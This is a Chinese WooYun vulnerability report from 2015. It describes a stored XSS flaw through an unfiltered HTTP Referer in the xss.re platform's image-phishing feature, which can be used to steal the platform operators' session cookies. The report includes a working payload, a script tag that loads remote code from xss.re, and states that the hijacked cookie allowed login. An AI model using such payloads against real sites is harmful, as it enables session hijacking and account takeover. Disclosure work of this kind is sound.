漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-090449
漏洞标题:某XSS平台存在安全漏洞
相关厂商:08sec.com
漏洞作者: Non-polar
提交时间:2015-01-07 16:30
修复时间:2015-01-12 16:32
公开时间:2015-01-12 16:32
漏洞类型:网络设计缺陷/逻辑错误
危害等级:低
自评Rank:1
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-01-07: 细节已通知厂商并且等待厂商处理中
2015-01-12: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
cookie中的agent已经过滤了,没提交的了......提交这个吧,利用范围比较小,仅供参考
详细说明:
漏洞平台:xss.re
问题出在图片伪造钓鱼项目中的HTTP_REFERER未做过滤,可以执行XSS代码。当我打开某个有图片伪造钓鱼的页面,我修改为XSS代码的HTTP_REFERER就会被钓鱼者获取到,当他打开此项目时,XSS代码就会在钓鱼者的XSS平台执行。如果这段XSS代码是获取对方cookie的,那么我就可以获取到他xss.re平台的cookie。
下面看过程
我用的火狐RefControl插件,修改referer为XSS代码<script src=http://xss.re/7188></script>
创建了一个图片伪造钓鱼项目http://xss.re/api-7187.jpg,命名为目标,和一个接受cookie项目,见下图
利用空间留言板做测试
测试了下,cookie是可以登录的
漏洞证明:
修复方案:
版权声明:转载请注明来源 Non-polar@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-01-12 16:32
厂商回复:
最新状态:
2015-01-12:我们按照洞主提供的信息并没有复现出该漏洞。